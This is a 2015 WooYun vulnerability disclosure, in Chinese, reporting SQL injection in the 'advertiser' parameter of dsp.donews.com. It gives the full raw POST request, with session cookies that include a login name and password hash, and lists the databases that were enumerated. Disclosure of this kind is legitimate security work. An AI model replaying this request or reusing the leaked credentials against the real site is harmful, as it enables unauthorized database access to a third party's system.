乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-23: 细节已通知厂商并且等待厂商处理中 2015-08-28: 厂商已经主动忽略漏洞,细节向公众公开
dba注入
POST /advertiser/ajax_page/0 HTTP/1.1Host: dsp.donews.comContent-Length: 35Accept: */*Origin: http://dsp.donews.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: http://dsp.donews.com/advertiser/indexAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: pgv_pvi=2794665984; pgv_si=s7874044928; BAIDU_DUP_lcr=http://www.wooyun.org/corps/page/40; Hm_lvt_7cb6c297efb61b417d1027283fcccdb6=1440324052,1440324296,1440332101; Hm_lpvt_7cb6c297efb61b417d1027283fcccdb6=1440332883; PHPSESSID=o8c9eo5fsnc5jg4p86urha8rt4; ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221cda0480c2e44fbdf9543b25b7990bf7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A11%3A%221.25.28.101%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A110%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F44.0.2403.107+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1440333557%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A10%3A%22login_name%22%3Bs%3A6%3A%22yxtest%22%3Bs%3A8%3A%22password%22%3Bs%3A32%3A%22860b1d6552a8ed6d71c35b6de6ae0596%22%3Bs%3A7%3A%22dsp_uid%22%3Bs%3A2%3A%2221%22%3Bs%3A9%3A%22flow_type%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22jzw%22%3Bs%3A0%3A%22%22%3B%7D529c7a7b4cd65d09cec2f6374df8a737d8c8615fsed=&adv_category_id=0&advertiser=1
参数advertise克注入!
available databases [4]:[*] information_schema[*] mysql[*] performance_schema[*] rtb
危害等级:无影响厂商忽略
忽略时间:2015-08-28 23:04
漏洞Rank:4 (WooYun评价)
暂无